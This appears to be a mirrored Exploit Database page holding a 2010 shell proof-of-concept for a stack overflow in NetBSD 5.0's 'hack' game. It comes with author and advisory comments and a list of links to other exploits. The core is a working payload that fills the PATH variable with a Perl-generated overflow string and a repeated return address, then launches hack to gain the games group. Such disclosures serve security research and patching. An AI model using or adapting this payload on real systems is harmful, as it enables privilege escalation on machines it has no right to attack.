NetBSD 5.0 – Hack PATH Environment Overflow (PoC)

Exploit Database
14 阅读

作者： JMIT

日期： 2010-05-18
类别：
- dos
平台：
- netbsd_x86
来源：https://www.exploit-db.com/exploits/12653/

#!/bin/sh

# NetBSD 5.0 and below Hack PATH Environment overflow proof of concept
# Successfull Exploitation gives guid 100 (games)
# Vulnerable Function is in hack.unix.c
# It is a basic strcpy stack overflow. Such overflows are hard to exploit in
# NetBSD. If you can exploit it successfully feel free to contact me
# Original Advisorie: NetBSD-SA2009-007

# Title: hack rougelike game PATH stack overflow
# Author: JMIT (office@johannesmaria.at)
# Date: 18. May 2010
# Software Link: Contained in all NetBSD Distributions as default
# Version: NetBSD 5.0 and below
# Tested on: NetBSD 5.0-RELEASE
# CVE: Not available. See NetBSD-SA2009-007
# Code:

export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("\x41\xb0\xe5\xbf\xbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack

last Exploits
NetBSD 5.0 – Hack PATH Environment Overflow (PoC)的更多信息

One Search 1.1.0.0 – Denial of Service (PoC)：
Jzip 1.3 – ‘.zip’ Unicode Buffer Overflow (PoC)：
Symantec AntiVirus – Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink：
AppXSvc 17763 – Arbitrary File Overwrite (DoS)：
Adobe Flash – Metadata Parsing Out-of-Bounds Read：
Microsoft Excel 2003 11.8335.8333 – Use-After-Free：
SpotFTP FTP Password Recovery 3.0.0.0 – ‘Key’ Denial of Service (PoC)：
Microsoft Windows Kernel – ‘win32k.sys’ Multiple ‘NtGdiGetDIBitsInternal’ System Call：